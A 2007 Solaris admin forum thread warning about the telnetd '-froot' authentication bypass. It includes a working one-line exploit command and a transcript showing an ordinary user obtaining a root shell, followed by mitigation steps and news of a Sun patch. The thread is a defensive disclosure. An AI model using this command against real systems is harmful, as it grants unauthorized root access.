telnetd bug!


 
Thread Tools Search this Thread
Operating Systems Solaris telnetd bug!
# 1  
Old 02-14-2007
Error telnetd bug!

hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC

more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
# 2  
Old 02-14-2007
it's fixed, some hours later, there is already a patch from sun:

http://sunsolve.sun.com/search/docum...=1-26-102802-1

regards pressy
# 3  
Old 02-14-2007
Quote:
Originally Posted by pressy
hi mates,

a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:

Code:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 #  telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
                       Solaris 10 11/06 s10s_u3wos_10 SPARC

more info:
http://seclists.org/fulldisclosure/2007/Feb/0251.html

there is no patch, so you need to disable the telnetd:

solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"

be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!

regards pressy
This only relates to solaris 10.
# 4  
Old 02-15-2007
Quote:
This only relates to solaris 10.
I beleive so too, all the solaris 8 and 9 box I tested seem to be not vulnerable ... Many thankx for the info anyway (I used to be a great fan reader of bugtraq Smilie )
Login or Register to Ask a Question

Previous Thread | Next Thread

8 More Discussions You Might Find Interesting

1. AIX

telnetd daemon

Hi, When a client connected to AIX server by telnet is killed/crashes, is there a way for telnetd to recognize that and close/kill the application linked/started by that telnet session? We have a situation where clients disconnect because of frequent network outages, this leaves the... (2 Replies)
Discussion started by: mreyaz
2 Replies

2. SCO

Telnetd Port Options

Ok, here i am in 2008 trying to figure out how to edit the port of Telnetd in sco openserver 4.2. I googled my butt off and cant seem to find any info. Does anyone have some specific howto's or good documentation on this? (2 Replies)
Discussion started by: j0ntar
2 Replies

3. Solaris

Can't start telnetd

Hello all, I've got a problem on a V240 running Solaris 9, the telnet daemon won't start. The error message I get is "telnetd: stdin is not a socket file descriptor." I've never seen this message before and I'm not exactly sure what it means. I know generally what stdin, sockets, and file... (4 Replies)
Discussion started by: ONEX
4 Replies

4. Cybersecurity

telnetd vs telnetd -a

Hi folks. I have a quick question on using "telnetd" vs. "telnetd -a". OS: AIX 5.x (5.1 through 5.3 ML3) Some engineers at work want to stop using "telnetd -a" and use "telnetd". (and of course, if I could get a cogent answer from them, I wouldn't be posting this question...) :mad: The... (0 Replies)
Discussion started by: davidl9999
0 Replies

5. UNIX for Dummies Questions & Answers

telnetd: all network ports in use

I hope someone can enlighten me on this. A few weeks ago, the root file system my UnixWare 7.1.1 server became corrupt so I ended up doing a full restore of the OS from tape backup. Since then, after I get about 270 users on the system, the message "telnetd: all network ports in use" is... (1 Reply)
Discussion started by: davekox
1 Replies

6. UNIX for Dummies Questions & Answers

Get telnetd to start a process other than login

I want to be able to get telnetd to start a program of my choice or one that I have written . . . or . . . write a daemon of my own to listen on a port other than 23 and when a connection arrives it should create a controlling tty/pty and then launch my program on the client side of the pty. A... (2 Replies)
Discussion started by: pdenaro
2 Replies

7. IP Networking

in.telnetd[5115] -- compromised?

/* Linux Slackware */ looking in my logs I see tons of entries similar to below. Does anyone know what these mean, and should I be concerned. I looked up a few of the IP's at Arin.net and saw that many of them belong to isp's (not good).. Any information is helpful.. Body of Messages log... (1 Reply)
Discussion started by: LowOrderBit
1 Replies

8. UNIX for Dummies Questions & Answers

Linux and in.telnetd problems

Hi, This is not the usual "unable to telnet to my machine" post. I: * have ensured that in.telnetd is started from inet.conf * that hosts.allow/deny are correctly configured * in.telnetd is listening, and on the correct port When I check my syslog i notice that tcpd (as I have... (3 Replies)
Discussion started by: sam_pointer
3 Replies
Login or Register to Ask a Question